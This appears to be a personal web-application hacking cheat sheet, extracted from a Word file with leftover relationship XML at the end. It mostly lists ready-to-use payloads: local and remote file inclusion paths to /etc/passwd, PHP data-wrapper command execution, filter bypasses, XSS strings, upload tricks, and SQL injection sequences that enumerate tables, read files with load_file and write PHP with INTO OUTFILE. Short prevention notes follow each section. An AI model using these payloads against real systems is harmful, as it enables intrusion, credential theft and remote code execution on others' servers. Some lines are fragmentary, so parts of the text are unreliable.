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WEB APP HACKSHEET BY LIV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LFI - LOCAL FILE INCLUSION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Try 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?page=/../../../../../etc/passw OR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file:///etc/passw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php://filter/resource=/etc/passwd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 Try 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/proc/self/environ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SUCCESS - USER AGENT EXPLOIT WITH ADD-ON OR COOKIES - PHP SCRIPT - SHELL ACCESS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PHP WRAPPER INPUT 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data:;base64,&lt;?system($_GET['x']]);?&gt;&amp;x=ls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PHP WRAPPER ENCODED BASE 64 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data:;base64,PD9zeXN0ZW0oJF9HRVRbJ3gnXV0pOz8+&amp;x=ls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LFI PREVENTION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WHITELIST/BLACKLIST CAN BE BYPASSED - SEPERATE CODE FROM DATA (?,?,?) IN SQL - LESS USER INPUTS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Vulnerable code to LFI - include('files/' . $_GET['page']);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RFI - REMOTE FILE INCLUSION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 injecting into url some external websites.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SHELL ACCESS - R57 / C99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SOME DEFENSES YOU CAN BYPASS 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include($_GET['page'].'.php');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BYPASS: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? or %23 (#) or %00 (NullByteAttack)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$_GET['page'] = str_replace('http','',$_GET['page']);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BYPASS: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index.php?page=hthttptp://www.my-domain.com/my-file.txt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BLOCK http/https/ftp/data proctocol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BYPASS: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 every protocol and try HTtp or HttP , hTtp for example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RFI Prevention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this command in the server - register_globals = Off.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allow_url_include = On and allow_url_fopen = On - RFI ENABLED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Vulnerable code to LFI - include($_GET['page']);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XSS - Cross Site Scripting - REFLECTED OR STORED - BACKEND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&lt;script&gt;alert("check")&lt;/script&gt;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 injecting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&lt;img src='https://i.imgur.com/XX21TKK.png' /&gt;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 inputs. If works - inject external website/malicious-file.txt to manipulate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(Opens a JS script do what you want with it)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Prevention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HTTP ONLY COOKIES TO PREVENT COOKIE STEAL -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https://owasp.org/www-community/HttpOnly#Using_PHP_to_set_HttpOnly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HTMLSPECIALCHARS() -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https://www.php.net/manual/en/function.htmlspecialchars.php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Filter every input - INPUT VALIDATION ON EVERYTHING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DOM XSS - Document Object Module - FRONTEND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&lt;span onmouseover="alert('you just got DOM-XSSed');"&gt;Mouse over me&lt;/span&gt;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 injecting html into inputs.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Prevention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making sure the input not rendered to html, instead, pasted as text and not as dom objects.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 UPLOADING FILES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 uploading a php file, if not, try changing the Content-Type http header with a plugin.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also try spoofing file name, or null byting the filename end : image.php%00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Prevention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Don't give execute permissions, only read &amp; write (chmod()), do it on all files in upload folder.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SQL INJECTIONS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INPUT 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 injecting by closing the statement with ' then writing any sql code you want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example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blah' or 'x'='x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password.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Prevention : Use mysqli_real_escape_string() or prepared statements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UNION INJECTION IN URL - order by, to get how many colums there are in the db in users table.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/profile.php?id=1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order by (some number untill you get an error)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CHECK IF THERE IS AN SQL INJECTION BY GETTING VERSION OF THE MYSQL DB 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/profile.php?id=-1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AND 1=2' UNION SELECT 'x',version(),'z'-- spacebar+ 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GET DB NAME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/profile.php?id=-1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UNION SELECT 'x',database(),'z'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GET ALL TABLES FROM A SPECIFIC DB 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/profile.php?id=-1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UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema='sqli_lab'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GET ALL COLUMNS FROM A SPECIFIC TABLE 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/profile.php?id=-1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UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_schema='sqli_lab' AND table_name='users'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BLIND SQL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URL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Try Injecting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-1 UNION SELECT 1,2,3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TRUE &gt;&gt;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Try Injecting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-1 UNION SELECT 1,2,3 FROM admins/tbl_users/users/usernames/passwords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TRUE TABLE EXISTS&gt;&gt;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Try Injecting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-1 UNION SELECT 1,username,3 FROM users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-1 UNION SELECT 1,user_name,3 FROM users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-1 UNION SELECT 1,user,3 FROM users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TRUE COLUMN EXISTS &gt;&gt;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ERROR BASED SQL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URL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Try Injecting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 and extractvalue('lol',concat(':',database()));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FILE UPLOAD SQL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select 1,user(),3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union select 1,file_priv,3 from mysql.user where User='the_username'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&gt;&gt; IF Y &gt;&gt; THERE ARE WRITE INTOFILE PERMISSIONS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Get full path of the website from php errors and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SELECT '&lt;?php echo "top kek"; ?&gt;' INTO OUTFILE '/home/zix/funny.php'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union select 1,load_file('/etc/passwd'),3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owasp.org/www-community/HttpOnly#Using_PHP_to_set_HttpOnly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file://\etc\passw" Id="docRId0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship TargetMode="External" Target="https://www.php.net/manual/en/function.htmlspecialchars.php" Id="docRId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" /><Relationship Target="styles.xml" Id="docRId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" /></Relationships>
</file>